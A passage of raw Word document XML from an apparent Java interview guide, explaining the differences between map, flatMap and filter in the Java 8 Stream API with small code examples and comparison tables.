          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: flatMap is used to transform each element into a stream of new elements, and then it "flattens" all those streams into a single stream. This means that instead of returning a stream of values, it returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream of streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is then flattened into a single stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2872C0" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It produces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single flattened stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by flattening the results of applying the function to each element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6D9A2" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ype of Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The transformation is 1-to-many, i.e., each input element can produce zero or more output elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E980A4B" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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flatMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFD569"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List&lt;Integer&gt;&gt; listOfLists = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053AE1C8"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rrays.asList(1, 2, 3),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF477D1"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rrays.asList(4, 5, 6),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A575AD"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rrays.asList(7, 8, 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA04524"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8894102" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548FB5C7"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Integer&gt; flattenedList = listOfLists.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D7B25"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latMap(List::stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA0AD7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EB01F"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flattenedList);  // Output: [1, 2, 3, 4, 5, 6, 7, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067832F"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 flatMap takes each list inside the list of lists and flattens them into a single list of integers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E206788" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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0"/>
        <w:gridCol w:w="3927"/>
        <w:gridCol w:w="4467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4E9F7E06" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C30B4DB" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2397177E" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="766CFFD5" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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latMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="65D45D46" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57B27888"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ransformation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C6D6C4"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e-to-One (single element per input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B2A037C"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e-to-Many (multiple elements or none per input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="320BF807" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F0B2D3C"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ult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AD3125E"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eam of transformed values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E746322"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lattened Stream of values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3DE6F9C3" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1036F4DF"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="275CB7B3"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each input element transforms to one output element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0019B5"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each input element transforms to zero or more output elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4D2C8036" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610892D7"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F63C9E"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verting a string to uppercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21802C34"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lattening a list of lists into a single list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F3F6FBC" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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to use which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE4A26" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100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map** when you want to transform each element into another form or type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F7F40" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100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flatMap** when the transformation results in multiple values per input element, and you want to flatten them into a single stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59955642" w14:textId="153AFB95" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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11B0927">
          <v:rect id="_x0000_i1692" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C205FA" w14:textId="77777777" w:rsidR="00091087" w:rsidRPr="00CE4B95" w:rsidRDefault="00091087" w:rsidP="00091087">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7006F747" w14:textId="77777777" w:rsidR="005C4D73" w:rsidRPr="00CE4B95" w:rsidRDefault="005C4D73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="_Toc196307705"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Map and Filter in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="294980DF" w14:textId="38D09FA9" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">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Java 8 Stream API, map and filter are two different intermediate operations, and they serve different purposes. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1B14D" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B7E20" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The map function is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transforming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements in the stream. It takes each element of the stream and applies a transformation (via a function), producing a new stream of transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450254B9" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It produces a new stream where each element is the result of applying the given function to the corresponding element in the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05791D28" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ype of Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: map is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1-to-1 transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning each element in the original stream is mapped to exactly one element in the new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12603E88" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BA753"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5ECC4F"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Integer&gt; squaredNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0AC2C"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n -&gt; n * n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169D3AD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EA5675"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System.out.println(squaredNumbers);  // Output: [1, 4, 9, 16, 25]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003B2B4"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e example above, map squares each element of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB61F5" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919C12E" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The filter function is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the stream that satisfy a given condition (predicate). It keeps the elements that pass the filter condition and removes those that do not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14ECD3" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It produces a new stream that contains only the elements that satisfy the predicate condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE140C" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ype of Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: filter is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1-to-0 (or 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transformation, meaning each element either passes the condition and is retained in the new stream, or is filtered out (i.e., not included in the new stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E3EF72" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065AF26"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD0A44"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Integer&gt; evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F94CA"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BEB29"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF985AD"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evenNumbers);  // Output: [2, 4, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189E20A"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 filter selects only the even numbers from the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B16935" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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8"/>
        <w:gridCol w:w="3664"/>
        <w:gridCol w:w="5202"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="1F360202" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E1DEC59" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D00E0DB" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55BF192F" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9"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ilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="41103876" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75F7C9B6"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E0233CB"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ansforms each element to another form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7589C324"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lects elements based on a condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="61CB95A9" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2652CE6D"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sult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C5F0FB"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new stream of transformed elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31BAAEAB"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new stream of elements that pass the condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="5EA3A604" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A394F6E"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turn Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63A92366"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e element per input element (1-to-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ABFE43B"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Zero or one element per input element (1-to-0 or 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="5AC2EB19" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4724C796"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peration Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6909A10D"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ansformation (e.g., changing data, mapping types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31746E94"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ltering (e.g., keeping or removing elements based on a condition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="513F021A" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C1F4EE"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
